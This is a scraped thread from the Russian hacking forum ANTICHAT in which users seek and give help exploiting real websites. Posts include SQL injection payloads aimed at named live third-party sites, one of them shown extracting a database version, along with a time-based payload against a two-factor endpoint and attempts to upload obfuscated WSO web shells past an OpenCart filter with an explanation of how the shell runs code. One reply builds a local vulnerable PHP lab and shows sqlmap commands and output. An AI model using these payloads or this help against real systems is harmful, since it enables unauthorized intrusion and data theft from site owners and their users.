ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.02.2021, 15:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от b3
b3 said:
↑
Код:
Code:
sh -c grep SYN_RECV /tmp/check_ddos.res | awk {'print $5'}
Есть такой скрипт от рута, кто хорошо дружит с AWK подскажите есть ли возможность исполнить свой код, или записать в файл данные подставленные в $5? При условии что Файл доступен на запись
из man awk:
Код:
Code:
print Print the current record. The output record is terminated with the value of ORS.
print expr-list Print expressions. Each expression is separated by the value of OFS. The output record is terminated with the value of ORS.
print expr-list >file Print expressions on file. Each expression is separated by the value of OFS. The output record is terminated with the value of
ORS.
printf fmt, expr-list Format and print. See The printf Statement, below.
printf fmt, expr-list >file
Format and print on file.
на мой взгляд нет, так как вы не имеете возможность манипулировать саму строку для awk. Получается что-то вроде prepared statements для скули, даже если параметры манипулировать, то они не исполняются.
Код:
Code:
test@test: cat /tmp/check_ddos.res
SYN_RECV `whoami` ;whoami |whoami $(whoami) &&whoami ;{whoami}
test@test: grep SYN_RECV /tmp/check_ddos.res | awk {'print $1 $2 $3 $4 $5 $6 $7'}
SYN_RECV`whoami`;whoami|whoami$(whoami)&&whoami;{whoami}
|
|
|
|
24.02.2021, 11:30
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
подскажите как limit можно обойти?
Код:
Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and(extractvalue/*a*/(null,concat/*a*/(1,(select+username+from+be_users+limit+0,1))))%23
|
|
|
28.02.2021, 21:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
7210
Репутация:
0
|
|
Доброго всем.
Opencart. Версия не известна.
Могу залить файлы через catalog/download
Но, только те, что закодированы ионкубом. При переходе по ссылке, отображается закодированный код.
Так же если меняю расширение на wso.php.jpg файл не заливается. Проверка идёт по содержимому заливаемого файла.
Перепробовал все обфусцированные шеллы, что только смог найти, заливаются только те, где не содержится $dPassword
|
|
|
|
28.02.2021, 22:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
[QUOTE="polzunki"]
polzunki said:
↑
И просьба подсказать, как зайти на этот шелл?
[CODE]
Code:
$dPassword$dPassword.
Потомм данные d ксорятся с ключом pass, распаковываются и выполняются. |
|
|
|
03.03.2021, 12:12
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Помогите раскрутить
Код:
Code:
https://www.illingen.de/corona'
|
|
|
|
03.03.2021, 16:02
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Помогите раскрутить
Код:
Code:
https://www.illingen.de/corona'
_ww.illingen.de/corona')or(ExtractValue(1,concat_ws(0x3a,version() )))=('1
Сообщение от None
XPATH syntax error: '.33-0ubuntu0.16.04.1'
|
|
|
|
08.03.2021, 14:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
36807
Репутация:
1
|
|
Hi
Can u help to bypass and contunie this sqli with sqlmap ?
.SpoilerTarget" type="button">Spoiler: POST request
POST /sendtwofactor.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://setup.sk/
Cookie: PHPSESSID=961073f8435f8bee3b34b3e6b4ff6c48;lng=en
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari>
Host: setup.sk
Connection: Keep-alive
login=if(now()=sysdate()%2Csleep(6)%2C0)
at this moment sqlmap can not dump dbs, and I tried some tamper scripts also
Thanks ! |
|
|
|
18.03.2021, 23:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
15943
Репутация:
0
|
|
Добрый день, подскажите пожалуйста.
Есть сайт, уязвимость в json нашел с помощью acunetix
Отчет такой
Код:
Code:
POST site.com/api/R/countTabs HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: sails.sid=s%3AIEeBmBWMv6pkUjHoX13K94m6bsxyZETu.mAjwObh334BpSZtHzJN1nY4HBjL%2Fiyt3uvwTjN6K5pQ;rtl=0;noAuthLanguage=%7B%22languageId%22%3A2%2C%22languageName%22%3A%22ru%22%7D;44cc0ec1aaa79f8d1d2757739ec41b84=1;favorites=j%3A%5B%2216880%22%5D;csrftoken=uq60dSDyNfzDlNREVBpktbbTqAxQDhPrfH3WQqvmfCw8ZgcqVZkYF91wKftnxCcS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host:site.com
Connection: Keep-alive
{"where":{"chart":{"not":"[]"},"invisible":"0 RLIKE (SELECT (CASE WHEN (1+1-2+000194=2+2-4+000194) THEN 1 ELSE 0x28 END)) -- "},"tab":"growth"}
Так вот, чем крутить такое? Точнее через что? |
|
|
|
20.03.2021, 21:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от Duble
Duble said:
↑
Добрый день, подскажите пожалуйста.
Есть сайт, уязвимость в json нашел с помощью acunetix
Отчет такой
Код:
Code:
POST site.com/api/R/countTabs HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: sails.sid=s%3AIEeBmBWMv6pkUjHoX13K94m6bsxyZETu.mAjwObh334BpSZtHzJN1nY4HBjL%2Fiyt3uvwTjN6K5pQ;rtl=0;noAuthLanguage=%7B%22languageId%22%3A2%2C%22languageName%22%3A%22ru%22%7D;44cc0ec1aaa79f8d1d2757739ec41b84=1;favorites=j%3A%5B%2216880%22%5D;csrftoken=uq60dSDyNfzDlNREVBpktbbTqAxQDhPrfH3WQqvmfCw8ZgcqVZkYF91wKftnxCcS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host:site.com
Connection: Keep-alive
{"where":{"chart":{"not":"[]"},"invisible":"0 RLIKE (SELECT (CASE WHEN (1+1-2+000194=2+2-4+000194) THEN 1 ELSE 0x28 END)) -- "},"tab":"growth"}
Так вот, чем крутить такое? Точнее через что? так как стало самому интересно, решил потестить, в общем если коротко, то скульмап распознаёт что имеет дело с JSON, и указывать заголовки не обязательно. В том месте где находится инъекция (в вашем случае "invisible") вставляете просто звёздочку (*) и смотря что за запрос, можно поставить дефолтовое знание через prefix (например --prefix=0):
Код:
Code:
sqlmap -u 'http://site.com/api/R/countTabs' -H 'Content-Type: application/json;charset=UTF-8' --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --prefix=0
Что-бы потестить поднял простой скрипт:
.SpoilerTarget" type="button">Spoiler: Тестовая площадка
Данные в базе:
Код:
Code:
CREATE DATABASE testdb;
CREATE USER IF NOT EXISTS 'testuser'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON testdb.* TO 'testuser'@'localhost';
FLUSH PRIVILEGES;
CREATE TABLE users(id INT AUTO_INCREMENT PRIMARY KEY, firstname VARCHAR(255) NOT NULL, lastname VARCHAR(255) NOT NULL, active BOOLEAN NOT NULL DEFAULT FALSE);
INSERT INTO users(firstname,lastname,active) VALUES('Ivan','Test',0);
INSERT INTO users(firstname,lastname,active) VALUES('John','Doe',0);
INSERT INTO users(firstname,lastname,active) VALUES('Test','Admin',1);
Само "приложение" с JSON (естественно с отладкой и кривое и косое)...
Код:
Code:
connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";
}catch(mysqli_sql_exception $e){
throw $e;
}
# Deprecated since PHP5.6 and removed since PHP7
# https://www.php.net/manual/pt_BR/reserved.variables.httprawpostdata.php
#var_dump($HTTP_RAW_POST_DATA);
$inputJSON = file_get_contents('php://input');
var_dump($inputJSON);
$jsonOBJ = json_decode($inputJSON);
var_dump($jsonOBJ);
$invisible_var = $jsonOBJ->{"where"}->{"invisible"};
var_dump($invisible_var);
$sql = 'SELECT id,firstname,lastname FROM users WHERE active=' . $invisible_var;
printf("SQL query: ".$sql);
$conn->real_query($sql);
if ($result = $conn->use_result()) {
foreach ($result as $row) {
echo "\nid = " . $row['id'] . " firstname = " . $row['firstname'] . " lastname = " .$row['lastname'];
}
/* free result set */
$result->close();
}
$conn->close();
?>
Поднимаем локальный пых-сервер в папке с "приложением" (у меня оно лежит под json_server.php)
Код:
Code:
php -S localhost:1234
Теперь тест от руки:
Код:
Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://localhost:1234/json_server.php
--------------------------------
Connected successfullystring(63) "{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(1) "0"
}
["tab"]=>
string(6) "growth"
}
string(1) "0"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe
Теперь простейшая иньекция:
Код:
Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://testserver:1234/json_server.php
------------------------------------
Connected successfullystring(70) "{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(8) "0 OR 1=1"
}
["tab"]=>
string(6) "growth"
}
string(8) "0 OR 1=1"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0 OR 1=1
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe
id = 3 firstname = Test lastname = Admin
Дальше запускаем Бурп и в другой консоли/терминале запускаем скульмап:
Код:
Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:40:18] [INFO] flushing session file
[18:40:18] [INFO] testing connection to the target URL
[18:40:18] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:40:18] [INFO] testing if the target URL content is stable
[18:40:18] [INFO] target URL content is stable
[18:40:18] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:40:18] [WARNING] (custom) POST parameter 'JSON #1*' does not appear to be dynamic
[18:40:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:40:18] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:40:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:40:19] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:40:19] [INFO] testing 'Generic inline queries'
[18:40:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:40:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:40:19] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:40:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:40:20] [WARNING] (custom) POST parameter 'JSON #1*' does not seem to be injectable
[18:40:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
При этом без прификса скульмап не смог раскрутить скулю
Код:
Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/' --flush-session --prefix=0
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:43:08] [INFO] flushing session file
[18:43:08] [INFO] testing connection to the target URL
[18:43:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:43:08] [INFO] testing if the target URL content is stable
[18:43:09] [INFO] target URL content is stable
[18:43:09] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:43:09] [INFO] (custom) POST parameter 'JSON #1*' appears to be dynamic
[18:43:09] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:43:09] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON #1*' might be vulnerable to cross-site scripting (XSS) attacks
[18:43:09] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:43:09] [WARNING] reflective value(s) found and filtering out
[18:43:09] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:43:09] [INFO] testing 'Generic inline queries'
[18:43:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:43:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:43:09] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[18:43:19] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:43:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:43:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:43:25] [INFO] target URL appears to be UNION injectable with 3 columns
[18:43:25] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 55 HTTP(s) requests:
---
Parameter: JSON #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 AND (SELECT 8656 FROM (SELECT(SLEEP(5)))iyJH)"},"tab":"growth"}
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 UNION ALL SELECT CONCAT(0x7170786b71,0x697a4b487962727759494a414871686b654176576663644e4b55574770616b786a66626f617a6d47,0x716b707871),NULL,NULL-- -"},"tab":"growth"}
---
[18:43:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.15
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
|
|
|
|
21.03.2021, 07:28
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от fandor9
fandor9 said:
↑
так как стало самому интересно, решил потестить, в общем если коротко, то скульмап распознаёт что имеет дело с JSON, и указывать заголовки не обязательно. В том месте где находится инъекция (в вашем случае "invisible") вставляете просто звёздочку (*) и смотря что за запрос, можно поставить дефолтовое знание через prefix (например --prefix=0):
Код:
Code:
sqlmap -u 'http://site.com/api/R/countTabs' -H 'Content-Type: application/json;charset=UTF-8' --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --prefix=0
Что-бы потестить поднял простой скрипт:
Spoiler: Тестовая площадка
Данные в базе:
Код:
Code:
CREATE DATABASE testdb;
CREATE USER IF NOT EXISTS 'testuser'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON testdb.* TO 'testuser'@'localhost';
FLUSH PRIVILEGES;
CREATE TABLE users(id INT AUTO_INCREMENT PRIMARY KEY, firstname VARCHAR(255) NOT NULL, lastname VARCHAR(255) NOT NULL, active BOOLEAN NOT NULL DEFAULT FALSE);
INSERT INTO users(firstname,lastname,active) VALUES('Ivan','Test',0);
INSERT INTO users(firstname,lastname,active) VALUES('John','Doe',0);
INSERT INTO users(firstname,lastname,active) VALUES('Test','Admin',1);
Само "приложение" с JSON (естественно с отладкой и кривое и косое)...
Код:
Code:
connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";
}catch(mysqli_sql_exception $e){
throw $e;
}
# Deprecated since PHP5.6 and removed since PHP7
# https://www.php.net/manual/pt_BR/reserved.variables.httprawpostdata.php
#var_dump($HTTP_RAW_POST_DATA);
$inputJSON = file_get_contents('php://input');
var_dump($inputJSON);
$jsonOBJ = json_decode($inputJSON);
var_dump($jsonOBJ);
$invisible_var = $jsonOBJ->{"where"}->{"invisible"};
var_dump($invisible_var);
$sql = 'SELECT id,firstname,lastname FROM users WHERE active=' . $invisible_var;
printf("SQL query: ".$sql);
$conn->real_query($sql);
if ($result = $conn->use_result()) {
foreach ($result as $row) {
echo "\nid = " . $row['id'] . " firstname = " . $row['firstname'] . " lastname = " .$row['lastname'];
}
/* free result set */
$result->close();
}
$conn->close();
?>
Поднимаем локальный пых-сервер в папке с "приложением" (у меня оно лежит под json_server.php)
Код:
Code:
php -S localhost:1234
Теперь тест от руки:
Код:
Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://localhost:1234/json_server.php
--------------------------------
Connected successfullystring(63) "{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(1) "0"
}
["tab"]=>
string(6) "growth"
}
string(1) "0"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe
Теперь простейшая иньекция:
Код:
Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://testserver:1234/json_server.php
------------------------------------
Connected successfullystring(70) "{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(8) "0 OR 1=1"
}
["tab"]=>
string(6) "growth"
}
string(8) "0 OR 1=1"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0 OR 1=1
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe
id = 3 firstname = Test lastname = Admin
Дальше запускаем Бурп и в другой консоли/терминале запускаем скульмап:
Код:
Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:40:18] [INFO] flushing session file
[18:40:18] [INFO] testing connection to the target URL
[18:40:18] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:40:18] [INFO] testing if the target URL content is stable
[18:40:18] [INFO] target URL content is stable
[18:40:18] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:40:18] [WARNING] (custom) POST parameter 'JSON #1*' does not appear to be dynamic
[18:40:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:40:18] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:40:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:40:19] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:40:19] [INFO] testing 'Generic inline queries'
[18:40:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:40:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:40:19] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:40:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:40:20] [WARNING] (custom) POST parameter 'JSON #1*' does not seem to be injectable
[18:40:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
При этом без прификса скульмап не смог раскрутить скулю
Код:
Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/' --flush-session --prefix=0
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:43:08] [INFO] flushing session file
[18:43:08] [INFO] testing connection to the target URL
[18:43:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:43:08] [INFO] testing if the target URL content is stable
[18:43:09] [INFO] target URL content is stable
[18:43:09] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:43:09] [INFO] (custom) POST parameter 'JSON #1*' appears to be dynamic
[18:43:09] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:43:09] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON #1*' might be vulnerable to cross-site scripting (XSS) attacks
[18:43:09] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:43:09] [WARNING] reflective value(s) found and filtering out
[18:43:09] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:43:09] [INFO] testing 'Generic inline queries'
[18:43:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:43:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:43:09] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[18:43:19] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:43:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:43:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:43:25] [INFO] target URL appears to be UNION injectable with 3 columns
[18:43:25] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 55 HTTP(s) requests:
---
Parameter: JSON #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 AND (SELECT 8656 FROM (SELECT(SLEEP(5)))iyJH)"},"tab":"growth"}
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 UNION ALL SELECT CONCAT(0x7170786b71,0x697a4b487962727759494a414871686b654176576663644e4b55574770616b786a66626f617a6d47,0x716b707871),NULL,NULL-- -"},"tab":"growth"}
---
[18:43:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.15
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Сообщение от Duble
Duble said:
↑
Добрый день, подскажите пожалуйста.
Есть сайт, уязвимость в json нашел с помощью acunetix
Отчет такой
Код:
Code:
POST site.com/api/R/countTabs HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: sails.sid=s%3AIEeBmBWMv6pkUjHoX13K94m6bsxyZETu.mAjwObh334BpSZtHzJN1nY4HBjL%2Fiyt3uvwTjN6K5pQ;rtl=0;noAuthLanguage=%7B%22languageId%22%3A2%2C%22languageName%22%3A%22ru%22%7D;44cc0ec1aaa79f8d1d2757739ec41b84=1;favorites=j%3A%5B%2216880%22%5D;csrftoken=uq60dSDyNfzDlNREVBpktbbTqAxQDhPrfH3WQqvmfCw8ZgcqVZkYF91wKftnxCcS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host:site.com
Connection: Keep-alive
{"where":{"chart":{"not":"[]"},"invisible":"0 RLIKE (SELECT (CASE WHEN (1+1-2+000194=2+2-4+000194) THEN 1 ELSE 0x28 END)) -- "},"tab":"growth"}
Так вот, чем крутить такое? Точнее через что? Можно было просто взять пакет запроса с акунектикса, в уязвимом параметре поставить звездочку, сохранить в файл и вызвать его параметром -r file.txt
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
